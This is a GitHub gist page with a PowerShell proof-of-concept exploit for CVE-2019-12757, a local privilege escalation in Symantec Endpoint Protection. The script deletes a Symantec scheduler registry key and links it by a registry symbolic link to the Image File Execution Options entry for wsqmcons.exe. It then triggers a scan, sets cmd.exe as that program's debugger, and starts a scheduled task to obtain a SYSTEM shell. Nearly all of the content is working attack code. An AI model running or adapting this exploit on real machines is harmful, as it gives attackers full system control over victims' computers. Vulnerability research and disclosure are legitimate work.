-
-
Save enigma0x3/5dbb9a72b592992b27dd703edb4c20b1 to your computer and use it in GitHub Desktop.
CVE-2019-12757
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Write-Host "[*] Installing NTObjectManager..." -ForeGroundColor "Green" | |
install-module NTObjectManager -Scope CurrentUser -Force | |
import-module NTObjectManager | |
Write-Host "[*] Checking for Tamper Protection" -ForeGroundColor "Green" | |
$Result = Get-ItemProperty "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan" -Name Disabled | |
if($Result.Disabled -eq "1") | |
{ | |
$User = [System.Security.Principal.WindowsIdentity]::GetCurrent().User | |
$SID = $User.Value | |
Write-Host "[*] User's SID is: $SID" -ForeGroundColor "Green" | |
Write-Host "[*] Removing registry key..." -ForeGroundColor "Green" | |
Remove-Item "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID" -Recurse -Force | |
Write-Host "[*] Creating Symbolic link to IFEO on wsqmcons.exe" -ForeGroundColor "Green" | |
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID",$null, "\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe") | |
Write-Host "[*] Symbolic Link Created, triggering vulnerability..." -ForeGroundColor "Green" | |
New-Item -Path "c:\" -Name "exploit" -ItemType "directory" | |
Start-Process "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\DoScan.exe" -ArgumentList "/ScanDir C:\exploit" | |
Write-Host "[*] Sleeping 10 seconds" -ForeGroundColor "Green" | |
Start-Sleep "10" | |
Write-Host "[*] Adding debugger key to on IFEO of wsqmcons.exe..." -ForeGroundColor "Green" | |
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe" -Name "Debugger" -PropertyType "String" -Value "C:\Windows\System32\cmd.exe /c cmd.exe" | |
Write-Host "[*] Starting the Consolidator Task..." -ForeGroundColor "Green" | |
Get-ScheduledTask "Consolidator" | Start-ScheduledTask | |
Write-Host "Done, cmd.exe should be running as NT AUTHORITY\SYSTEM" -ForeGroundColor "Green" | |
} else{ | |
Write-Host "[!] Tamper protection on, exiting" -ForeGroundColor "Red" | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment